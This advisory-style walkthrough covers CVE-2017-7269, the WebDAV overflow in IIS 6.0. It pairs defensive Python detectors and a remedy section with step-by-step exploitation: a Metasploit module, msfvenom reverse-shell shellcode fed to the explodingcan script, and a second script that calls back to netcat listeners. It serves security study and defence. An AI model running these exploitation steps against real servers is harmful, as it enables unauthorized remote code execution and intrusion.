Microsoft IIS 6.0 is vulnerable to a buffer overflow caused by improper bounds checking in the ScStoragePathFromUrl function of the WebDAV service (httpext.dll). By sending a PROPFIND request with an overly long If: header that begins with http://, a remote, unauthenticated attacker can overflow a buffer and execute arbitrary code on the system in the context of the IIS worker process (typically NT AUTHORITY\NETWORK SERVICE, so privilege escalation is usually still needed afterwards). WebDAV must be enabled on the server for the vulnerable code to be reachable. The issue is tracked as CVE-2017-7269.
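The trigger shape described above (a PROPFIND whose If: header is abnormally long and built from <http://...> resource tags) is what a proxy, WAF or IDS can key on. The following is an added example, not part of the original advisory: it checks a raw HTTP request for that shape. The 256-byte threshold and the two sample requests are constructed assumptions, not captured traffic, and the function names are hypothetical.

```python
"""Added example (not from the original advisory): request-level check for the
CVE-2017-7269 trigger shape. Flags a PROPFIND whose If: header is over-long and
carries <http:// resource tags. Threshold and samples are assumptions."""

import re

# Assumption: legitimate If: headers (lock tokens, ETags) are short; the public
# CVE-2017-7269 exploits send well over a kilobyte in this header.
IF_HEADER_LIMIT = 256

# Matches one "If:" header line inside the request head (no header folding).
_IF_HEADER = re.compile(rb"^If:[ \t]*(.*?)\r?$", re.IGNORECASE | re.MULTILINE)


def request_method(raw: bytes) -> str:
    """First token of the request line, e.g. 'PROPFIND'."""
    return raw.split(b" ", 1)[0].decode("latin-1").upper()


def if_header(raw: bytes):
    """Value of the If: header taken from the request head, or None."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    m = _IF_HEADER.search(head)
    return m.group(1) if m else None


def is_scstoragepathfromurl_attempt(raw: bytes):
    """Return (flagged, reason). Flags only the combination the overflow
    needs: PROPFIND + over-long If: header + at least one <http:// tag."""
    if request_method(raw) != "PROPFIND":
        return False, "not a PROPFIND"
    value = if_header(raw)
    if value is None:
        return False, "no If header"
    tags = re.findall(rb"<http://", value, re.IGNORECASE)
    if not tags:
        return False, "If header carries no http:// resource tag"
    if len(value) <= IF_HEADER_LIMIT:
        return False, "If header within normal length"
    return True, "PROPFIND with %d-byte If header and %d http:// tag(s)" % (
        len(value), len(tags))


# Constructed samples (hypothetical lab host, not real captures).
BENIGN = (
    b"PROPFIND /docs/ HTTP/1.1\r\n"
    + b"Host: 10.10.10.15\r\n"
    + b"Depth: 1\r\n"
    + b"If: <http://10.10.10.15/docs/> (<opaquelocktoken:1234>)\r\n"
    + b"Content-Length: 0\r\n\r\n"
)

SUSPICIOUS = (
    b"PROPFIND / HTTP/1.1\r\n"
    + b"Host: 10.10.10.15\r\n"
    + b"Content-Length: 0\r\n"
    + b"If: <http://10.10.10.15/" + b"A" * 600 + b"> (Not <locktoken:write1>) "
    + b"<http://10.10.10.15/" + b"B" * 600 + b">\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, is_scstoragepathfromurl_attempt(req))
```

Length alone is a weak signal, so the check also requires the method and the http:// tag; tune IF_HEADER_LIMIT against the WebDAV clients actually in use before alerting on it.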

Affected Products

Microsoft IIS 6.0 (Windows Server 2003 / 2003 R2) with the WebDAV extension enabled. Later IIS versions are not affected.

Detection

Nmap

  • nmap -T4 -p80 --script=http-iis-webdav-vuln 10.10.10.15

    This script tests the older IIS 5.1/6.0 WebDAV authentication bypass (CVE-2009-1535). A positive result shows WebDAV is enabled on IIS 6.0, which is the precondition for CVE-2017-7269, but the script does not test CVE-2017-7269 itself.

  • nmap --script http-webdav-scan -p80 10.10.10.14

    Enumerates WebDAV support and the methods the server allows. The combination to look for is Server: Microsoft-IIS/6.0 with PROPFIND among the allowed methods.
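An added example, not code from the original page or from nmap: an active check that approximates what the two scripts above report. It sends a single OPTIONS request (no exploit traffic) and decides from the Server, DAV, Allow and Public headers whether the host is IIS 6.0 with WebDAV enabled, i.e. whether CVE-2017-7269 is in scope at all. The two sample responses are constructed in the shape IIS 6.0 produces, not captures from a real host, and the function names are hypothetical.

```python
"""Added example (not from the original page): IIS 6.0 / WebDAV fingerprint
via a single OPTIONS request. Sample responses below are constructed."""

import socket
import sys


def build_options_request(host: str) -> bytes:
    """OPTIONS / is the cheapest way to get IIS to list DAV support."""
    return (
        "OPTIONS / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: webdav-check\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def parse_response(raw: bytes):
    """Return (status_code, headers). Header names are lower-cased and
    repeated headers are joined with ', '."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = headers[name] + ", " + value if name in headers else value
    return status, headers


def assess(raw: bytes) -> dict:
    """Classify an OPTIONS response: IIS 6.0? WebDAV advertised? PROPFIND
    (the method the overflow is triggered with) accepted?"""
    status, h = parse_response(raw)
    methods = {m.strip().upper()
               for key in ("allow", "public")
               for m in h.get(key, "").split(",") if m.strip()}
    result = {
        "status": status,
        "iis6": h.get("server", "").startswith("Microsoft-IIS/6.0"),
        "webdav": "dav" in h,          # "DAV: 1, 2" is only sent with WebDAV on
        "propfind": "PROPFIND" in methods,
    }
    result["in_scope"] = result["iis6"] and (result["webdav"] or result["propfind"])
    return result


def probe(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Send the OPTIONS request over TCP and assess the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_options_request(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return assess(b"".join(chunks))


# Constructed sample responses (not captured from a real server).
SAMPLE_IIS6_WEBDAV = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"MS-Author-Via: DAV\r\n"
    b"DAV: 1, 2\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    b"PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    b"PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Content-Length: 0\r\n\r\n"
)

SAMPLE_IIS6_NO_WEBDAV = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:          # python iis6_webdav_check.py <host> [port]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        print(probe(sys.argv[1], port))
    else:
        print(assess(SAMPLE_IIS6_WEBDAV))
        print(assess(SAMPLE_IIS6_NO_WEBDAV))
```

A host that reports iis6 but not webdav/propfind is not exploitable through this bug; one that reports in_scope still needs the patch state confirmed, since a patched IIS 6.0 answers OPTIONS identically.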

Exploitation (Metasploit)

1. Use the module exploit/windows/iis/iis_webdav_scstoragepathfromurl

  • search cve:2017-7269
  • use exploit/windows/iis/iis_webdav_scstoragepathfromurl
  • show options

2. Set the required options (target host and port, listener host and port) and launch the exploit

  • set RHOSTS 10.10.10.15
  • set RPORT 80
  • set LHOST 10.10.14.4
  • set LPORT 4444
  • run

3. Once the session comes back, drop from Meterpreter to a command shell

  • shell

Note: Payloads other than Meterpreter work as well, for example set payload windows/shell/reverse_tcp. The module also has to find the length of the site's physical path on disk, so a failed first attempt is not unusual: re-run it, or widen the path-length options listed by show options.

1. Exploitation (Script: explodingcan)

The vulnerability can also be exploited with a standalone script. This section uses explodingcan (https://github.com/danigargu/explodingcan), a Python script (written for Python 2) that takes the target URL and a file containing raw shellcode.

1. Download the script from GitHub

  • git clone https://github.com/danigargu/explodingcan.git
  • cd explodingcan
  • ls

2. Generate raw shellcode with msfvenom and save it to a file. Keep the -e x86/alpha_mixed encoder: the script delivers the payload inside the If: header and expects alphanumeric shellcode

  • msfvenom -p windows/shell_reverse_tcp -f raw -e x86/alpha_mixed LHOST=10.10.14.4 LPORT=4455 > shellcode_rev

3. Start a netcat listener on the LPORT given to msfvenom

  • nc -lvp 4455

4. Run the script and pass the reverse shellcode as argument

  • python explodingcan.py http://10.10.10.15 shellcode_rev

5. Check the listener; a cmd.exe shell should have connected back. If nothing arrives, confirm that LPORT and the nc port match and that the target actually has WebDAV enabled.

2. Exploitation (Script: iis6-exploit-2017-CVE-2017-7269)

A second standalone script is available at https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269. It carries its own reverse-shell payload, so no msfvenom step is needed; it takes the target IP and port and the listener IP and port as arguments.

1. Download the script from GitHub

  • git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git
  • cd iis6-exploit-2017-CVE-2017-7269
  • ls

2. Now start a netcat listener

  • nc -lvp 4455

3. Run the script with the target IP, target port, listener IP and listener port. The file in the repository is named with spaces, so quote it (or rename it to add a .py extension)

  • python "iis6 reverse shell" 10.10.10.14 80 10.10.14.4 4455

4. Check the listener; a shell should have connected back

  • whoami

Remedy

Refer to Microsoft KB3197835 for the patch, upgrade or suggested workaround information. Where the update cannot be applied, disable WebDAV in IIS Manager (Web Service Extensions) so that httpext.dll is no longer loaded, and plan to retire the host: Windows Server 2003 and IIS 6.0 are end-of-life and no longer receive regular security updates.

References

https://packetstormsecurity.com/files/142060

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269

https://bugtraq.securityfocus.com/archive

https://exchange.xforce.ibmcloud.com/vulnerabilities/123756

https://www.f5.com/labs/articles/threat-intelligence/windows-iis-60-cve-2017-7269-is-targeted-again-to-mine-electroneum

https://nvd.nist.gov/vuln/detail/CVE-2017-7269